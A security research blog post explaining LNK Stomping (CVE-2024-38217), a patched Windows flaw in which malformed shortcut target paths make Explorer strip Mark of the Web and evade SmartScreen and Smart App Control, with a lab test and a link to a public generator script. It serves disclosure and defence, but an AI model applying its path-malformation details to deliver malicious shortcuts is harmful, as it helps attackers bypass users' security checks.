Overview

While Windows shortcut (LNK) files are designed for user convenience, they have long been exploited as initial access vectors by threat actors. Since Microsoft strengthened its macro-blocking policies in 2022, attackers have increasingly turned to alternative formats such as ISO, RAR, and LNK files in their attacks. LNK files are commonly distributed via email attachments or embedded within compressed archives. When executed, they often invoke trusted system utilities like PowerShell, cmd.exe, or mshta.exe, making the payload execution appear as legitimate system activity.

To mitigate such attacks, Windows adds a Mark of the Web (MoTW) metadata to files downloaded from the Internet. SmartScreen and Smart App Control (SAC) then perform reputation and policy checks based on this metadata. However, in 2024, Elastic Security Labs disclosed a technique called LNK Stomping, which abuses Windows Explorer’s path normalization process to remove the MoTW metadata—effectively bypassing these security checks. This vulnerability was assigned CVE-2024-38217 and patched on September 10, 2024. It has also been added to the CISA Known Exploited Vulnerabilities (KEV) catalog. This post will explain the concept and mechanism of LNK Stomping and provide security implications. 

 

LNK File

LNK files are shortcut files used by Windows to point to actual files, folders, or applications. The Windows Shell interprets the structure of an LNK file to execute or open the designated target (file/program or folder). These files contain various metadata and execution options, which attackers can manipulate to execute malicious code under the guise of legitimate operations.

 

LNK File Structure

The LNK file follow a binary structure defined by Microsoft and consists of the following key sections:

• Shell Link Header: Contains the core metadata of the LNK file, including LinkFlags, which indicate the presence of subsequent optional structures.
• LinkTarget IDList: A list of Shell Item IDs that identify the target location of the shortcut.
• LinkInfo: Provides the information about the target file’s location (local and network path) and volume information
• String Data
  • NAME_STRING: A name used to identify the user
  • RELATIVE_PATH: The relative path from the shortcut to the target
  • WORKING_DIR: The working directory used when the target is executed
  • COMMAND_LINE_ARGUMENTS: Arguments passed to the target upon execution
  • ICON_LOCATION: Location of the shortcut icon
• Extra Data: Additional information block that includes environment variables, console settings, trace data, and more

Figure 1. LNK file structure

 

Among these, the section to pay attention to is LinkTarget IDList.

Figure 2. Structure of LinkTarget IDList

The LinkTarget IDList is a section that accurately represents the location of the target that the LNK file actually points to through the hierarchical structure of the Windows Shell. This is a more sophisticated and flexible method of specifying a location, utilizing the Shell namespace concept instead of a simple file path string.

Threat actors can exploit this by setting the path and segment value of this field in a non-standard format to bypass the MoTW-based scanning flow. The specific behavior and cases will be covered in the following section on LNK Stomping.

 

LNK Stomping

LNK Stomping is an attack technique that exploits a vulnerability to bypass the Mark of the Web (MoTW) security feature in Windows, designated as CVE-2024-38217.

For more information about Mark of the Web, please refer to the Mark of the Web (MoTW) Bypass Vulnerability post. In brief, Mark of the Web (MoTW) is a Windows metadata identifier that adds an NTFS Alternate Data Stream (ADS) called Zone.Identifier to files downloaded from the Internet to indicate their source. Files with this MoTW label are subject to reputation and policy checks by Windows security features such as Smart App Control (SAC) and SmartScreen, which may warn or block the execution of files downloaded from untrusted sources.

 

LNK Stomping is an attack that manipulates the actual execution program path of a Windows shortcut file (.lnk) with an abnormal target path or internal structure. It then prompts explorer.exe to remove the MoTW metadata during the “normalization (Canonicalization)” process, thereby bypassing security checks. The process is as follows:

1. Clicked and executed an LNK file with a non-standard path or internal structure
2. It was confirmed that the target program path pointed by the LNK file is in an abnormal structure
3. explorer.exe normalizing a non-standard path/structure and then overwriting (re-saving) the LNK
   1. At this time, ADS is not maintained and MoTW is lost.
4. The MoTW label was removed before a security scan could be performed, so the file was excluded from being scanned and executed.

 

The previously mentioned “non-standard path/structure” refers to the way the path segment in the LinkTargetIDList is recorded, unlike the target path information that is normally saved in the IDList array shown in Figure 2. The details are as follows:

1. PathSegment type

• Normally, there is path data separated by a backslash (\) in the IDList array, which is a subfield of LinkTargetIDList
• However, the entire path is located in a single IDList array
  • Figure 3 Offset 0x7D: The entire path is recorded in the File’s ClassType structure, causing a structural error

Figure 3. LNK file of the PathSegment type

 

2. Dot Type

• Adds a period (.) at the end of the target path, causing a structural error
• Triggers the same behavior with a space

Figure 4. LNK file of the Dot type

 

3. Relative Type

• Does not follow the IDList structure like the PathSegment type
• Uses only the file name directly instead of the file path, causing a structural error

Figure 5. LNK file of the Relative type

 

To check if the security feature of Windows can be bypassed, the LNK Stomping test was conducted under the following conditions.

• Environment: Windows 10 22H2 (OS build 19045.3803)
  • Activation Status of SAC and SmartScreen
• LNK creation code: https[:]//github.com/joe-desimone/rep-research/blob/main/lnk_stomping/lnk_stomping.py
• LNK Behavior: Executes PowerShell to run calc with a pre-entered argument
• Both two files have the MoTW label.

 

First, when an LNK file without the LNK Stomping is executed, the file is blocked from being executed according to the SAC policy due to MoTW.

Figure 6. SAC blocking the execution of a malicious LNK file

 

However, when an LNK file with the LNK Stomping is used under the same conditions, the intended behavior is executed without being blocked.

Figure 7. Executing the lnk file using the LNK Stomping attack technique

 

If you check the ADS and Zone.Identifier of the executed LNK file, you can see that the MoTW label is no longer there.

Figure 8. ADS – MoTW deleted

 

Attack Case

As of now, there are no official reports attributing the exploitation of CVE-2024-38217 to a specific threat group. However, Joe Desimone of Elastic Security Labs, who first disclosed the vulnerability, identified multiple samples exhibiting LNK Stomping patterns on VirusTotal. Notably, the oldest submission dates back six years (as of August 6, 2024).

Furthermore, CVE-2024-38217 was officially added to the CISA KEV catalog on September 10, 2024, confirming its active exploitation. Rapid7 also highlighted the issue in its Patch Tuesday analysis, referencing public research and GitHub-hosted exploits that demonstrate ongoing abuse. While attribution remains unclear, its inclusion in KEV strongly indicates that attackers have been leveraging this technique for years.

 

Conclusion

Attacks abusing LNK files have become a persistent threat rather than a one-time trend. Techniques like LNK Stomping demonstrate how adversaries continue to refine evasion methods to bypass modern security controls. The official classification of CVE-2024-38217 and its listing in the CISA KEV catalog on September 10, 2024 underscore the real-world impact and operational use of this bypass technique.

What makes the LNK Stomping case particularly significant is that it was uncovered through security research, not incident response. Elastic’s findings revealed that this evasion method had been in use since at least 2018, long before it was formally documented. This highlights the importance of behavioral analysis and format-level research to uncover stealthy techniques that may not yet be reflected in threat intelligence feeds. 

Security teams must remain vigilant, continuously updating detection rules and defensive scenarios to account for evolving tactics. Even familiar file types like LNK can be repurposed in novel ways—especially in containerized delivery formats—making proactive threat hunting and adaptive defense strategies essential.

 

 

Reference

• CVE-2024-38217 – Security Update Guide – Microsoft – Windows Mark of the Web Security Feature Bypass Vulnerability
• NVD – CVE-2024-38217
• Known Exploited Vulnerabilities Catalog | CISA
• Dismantling Smart App Control — Elastic Security Labs
• Researchers Uncover Flaws in Windows Smart App Control and SmartScreen
• rep-research/lnk_stomping/lnk_stomping.py at 8e22c587e727ce2e3ea1ccab973941b7dd2244fc · joe-desimone/rep-research · GitHub
• Researchers unearth MotW bypass technique used by threat actors for years – Help Net Security
• Macro-Blocking & How Threat Actors Are Adapting | Proofpoint US
• As Microsoft blocks Office macros, hackers find new attack vectors